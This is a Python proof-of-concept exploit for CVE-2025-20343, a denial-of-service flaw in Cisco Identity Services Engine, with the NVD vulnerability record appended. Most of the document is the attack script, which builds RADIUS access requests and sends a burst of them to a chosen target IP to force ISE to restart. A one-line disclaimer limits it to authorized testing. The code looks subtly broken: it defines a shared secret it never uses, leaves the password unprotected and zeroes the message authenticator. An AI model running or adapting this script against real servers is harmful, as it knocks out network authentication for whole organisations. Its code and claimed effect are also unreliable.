CVE-2025-20343

#!/usr/bin/env python3 """ CVE-2025-20343 PoC - Cisco ISE RADIUS DoS Exploit This PoC demonstrates sending crafted RADIUS access requests to trigger the denial of service condition in Cisco ISE. WARNING: This code is for educational and authorized security testing only. """ import socket import struct import random import time def build_radius_packet(username, mac_address, request_id=1): """Build a RADIUS Access-Request packet""" # RADIUS packet header: Code(1) + ID(1) + Length(2) + Authenticator(16) code = 1 # Access-Request authenticator = bytes(random.getrandbits(8) for _ in range(16)) # Build attributes attributes = b'' # User-Name attribute (Type 1) username_bytes = username.encode() attributes += bytes([1, len(username_bytes) + 2]) + username_bytes # User-Password attribute (Type 2) password = b'password' password_padded = password.ljust(16, b'\x00')[:16] attributes += bytes([2, len(password_padded) + 2]) + password_padded # Calling-Station-Id attribute (Type 31) - MAC address mac_bytes = mac_address.encode() attributes += bytes([31, len(mac_bytes) + 2]) + mac_bytes # NAS-IP-Address attribute (Type 4) nas_ip = bytes([10, 0, 0, 1]) attributes += bytes([4, 6]) + nas_ip # NAS-Identifier attribute (Type 32) nas_id = b'CiscoISE' attributes += bytes([32, len(nas_id) + 2]) + nas_id # Message-Authenticator attribute (Type 80) msg_auth = bytes([80, 18]) + bytes(16) attributes += msg_auth # Calculate total length total_length = 20 + len(attributes) # Build packet packet = bytes([code, request_id]) + struct.pack('!H', total_length) + authenticator + attributes return packet def exploit_cisco_ise(target_ip, target_port=1812, mac_address='00:11:22:33:44:55'): """ Send crafted RADIUS requests to trigger CVE-2025-20343 Args: target_ip: Cisco ISE server IP target_port: RADIUS port (default 1812) mac_address: Target MAC address to use in requests """ print(f"[*] Starting CVE-2025-20343 exploit against {target_ip}") print(f"[*] Target MAC: {mac_address}") # Shared secret for RADIUS (default or known secret) shared_secret = b'Secret' try: sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.settimeout(5) # First, send a request to establish the endpoint as rejected print("[*] Step 1: Sending initial RADIUS request...") packet1 = build_radius_packet('test_user', mac_address, request_id=1) sock.sendto(packet1, (target_ip, target_port)) # Wait a moment time.sleep(0.5) # Send multiple crafted requests to trigger the vulnerability print("[*] Step 2: Sending crafted RADIUS request sequence...") for i in range(10): packet = build_radius_packet('test_user', mac_address, request_id=i+2) sock.sendto(packet, (target_ip, target_port)) time.sleep(0.2) print(f"[*] Sent packet {i+1}/10") print("[+] Exploit sent. If vulnerable, Cisco ISE should restart.") except socket.error as e: print(f"[-] Socket error: {e}") finally: sock.close() if __name__ == '__main__': import argparse parser = argparse.ArgumentParser(description='CVE-2025-20343 PoC') parser.add_argument('target', help='Target Cisco ISE IP address') parser.add_argument('--port', type=int, default=1812, help='RADIUS port') parser.add_argument('--mac', default='00:11:22:33:44:55', help='Target MAC address') args = parser.parse_args() exploit_cisco_ise(args.target, args.port, args.mac)

{"cve": {"id": "CVE-2025-20343", "sourceIdentifier": "[email protected]", "published": "2025-11-05T17:15:37.443", "lastModified": "2025-11-19T14:56:35.483", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability in the RADIUS setting Reject RADIUS requests from clients with repeated failures on Cisco Identity Services Engine (ISE) could allow an unauthenticated, remote attacker to cause Cisco ISE to restart unexpectedly.\r\n\r\nThis vulnerability is due to a logic error when processing a RADIUS access request for a MAC address that is already a rejected endpoint. An attacker could exploit this vulnerability by sending a specific sequence of multiple crafted RADIUS access request messages to Cisco ISE. A successful exploit could allow the attacker to cause a denial of service (DoS) condition when Cisco ISE restarts."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 4.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-697"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:cisco:identity_services_engine:3.4.0:-:*:*:*:*:*:*", "matchCriteriaId": "D23905E0-E525-49B1-8E5F-4EB42D186768"}, {"vulnerable": true, "criteria": "cpe:2.3:a:cisco:identity_services_engine:3.4.0:patch1:*:*:*:*:*:*", "matchCriteriaId": "74509498-38EF-4345-9583-CEF5C26CA1D8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:cisco:identity_services_engine:3.4.0:patch2:*:*:*:*:*:*", "matchCriteriaId": "CD05FF93-7B8C-4283-9DB7-E03FE98FAADF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:cisco:identity_services_engine:3.4.0:patch3:*:*:*:*:*:*", "matchCriteriaId": "0F9B6A8E-E773-44A3-9266-878F0C58EB41"}]}]}], "references": [{"url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-radsupress-dos-8YF3JThh", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}